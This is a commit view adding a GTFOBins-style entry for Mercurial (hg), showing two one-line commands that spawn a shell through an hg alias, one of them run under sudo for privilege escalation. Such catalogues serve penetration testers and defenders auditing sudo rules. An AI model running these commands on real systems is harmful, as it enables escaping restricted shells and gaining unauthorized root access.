This commit is contained in:
frissi0n 2024-11-11 13:27:49 +00:00
parent ac8e667a7e
commit 8093e7b815

7
_gtfobins/hg.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: hg --config alias.root='!sh' root
sudo:
- code: sudo hg --config alias.root='!sh' root
---